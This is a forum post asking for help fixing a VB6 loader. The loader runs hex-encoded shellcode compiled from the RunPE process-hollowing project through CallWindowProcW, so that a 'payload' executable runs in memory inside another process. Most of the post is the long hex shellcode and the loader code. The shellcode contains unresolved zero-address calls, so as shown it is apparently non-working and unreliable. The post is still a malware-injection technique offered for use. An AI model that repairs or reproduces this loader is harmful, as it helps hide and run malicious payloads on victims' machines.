Autor
Código:
Hello everyone i took this runpe https://github.com/d35ha/RunPE/tree/master
Extracted to machine code then converted to hex thats how im trying to use in vb6 but, no matter what i do it never worked. Always getting "WereFault". I think the problem could be 2.
1. Wrong Parammeters
2. Wrong index of the byte here VarPtr(byteArray(0))
CallWindowProcW VarPtr(byteArray(0))[, StrPtr(path), VarPtr(payload(0)), 0, 0
can anyone help me to fix the issue? here is the converted code.
Private Declare Function CallWindowProcW Lib "USER32" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Public Sub memory(ByVal path As String, payload() As Byte)
Dim ShellCode As String
ShellCode = "5589E55381ECC40000008B450C8945F08B45F00FB700663D4D5A0F85D30300008B45F08B403C89C28B450C01D08945EC8B45EC8B003D504500000F85B3030000C744240844000000C7442404000000008D8574FFFFFF890424E8000000005EC744240810000000C7442404000000008D45B8890424E800000000798D45B8894424248D8574FFFFFF89442420C744241C00000000C744241800000000C744241404000000C744241000000000C744240C00000000C744240800000000C7442404000000008B4508890424A100000000FFD083EC2885C00F95C084C00F8414030000C7042400000000A100000000FFD083EC04C74424040D000000890424A100000000FFD083EC088945E8C7042400000000A100000000FFD083EC04C74424041A000000890424A100000000FFD083EC088945E4C7042400000000A100000000FFD083EC04C744240429000000890424A100000000FFD083EC088945E0C7042400000000A100000000FFD083EC04C74424043B000000890424A100000000FFD083EC088945DCC744240C04000000C744240800100000C744240404000000C70424000000008B45E8FFD083EC108945D88B45D8C700070001008B45BC8B55D889542404890424A100000000FFD083EC0885C00F95C084C00F84190200008B45D88B80A400000083C00889C1"
ShellCode = ShellCode & "8B45B8C744241000000000C744240C040000008D9570FFFFFF89542408894C24048904248B45E0FFD083EC148B45EC8B40348B9570FFFFFF39D07541C704244E000000A100000000FFD083EC04C744240458000000890424A100000000FFD083EC088945D48B9570FFFFFF8B45B8895424048904248B45D4FFD083EC088B45EC8B50508B45EC8B403489C18B45B8C744241040000000C744240C0030000089542408894C24048904248B45E4FFD083EC148945D0837DD0000F844D0100008B45EC8B50548B45B8C7442410000000008954240C8B550C895424088B55D0895424048904248B45DCFFD083EC14C745F4000000008B45EC0FB740060FB7C03945F47D6D8B45F08B403C89C28B450C8D0C028B55F489D0C1E00201D0C1E00301C805F80000008945CC8B45CC8B50108B45CC8B48148B450C01C889C38B45CC8B480C8B45D001C889C18B45B8C7442410000000008954240C895C2408894C24048904248B45DCFFD083EC148345F401EB848B45EC8D50348B45D88B80A400000083C00889C18B45B8C744241000000000C744240C0400000089542408894C24048904248B45DCFFD083EC148B45EC8B50288B45D001C28B45D88990B0000000C704244E000000A100000000FFD083EC04C74424046D000000890424A100000000FFD083EC088945C88B45BC8B"
ShellCode = ShellCode & "55D8895424048904248B45C8FFD083EC088B45BC890424A100000000FFD083EC04C744240800800000C7442404000000008B450C890424A100000000FFD083EC0C908B5DFCC9C3909090"
Dim byteCount As Long
byteCount = Len(ShellCode) \ 2
Dim byteArray() As Byte
ReDim byteArray(byteCount - 1)
Dim i As Long
Dim k As Long
For i = 1 To Len(ShellCode) Step 2
byteArray(k) = CByte("&H" & Mid$(ShellCode, i, 2))
k = k + 1
Next i
CallWindowProcW VarPtr(byteArray(0)), StrPtr(path), VarPtr(payload(0)), 0, 0
End Sub
En línea
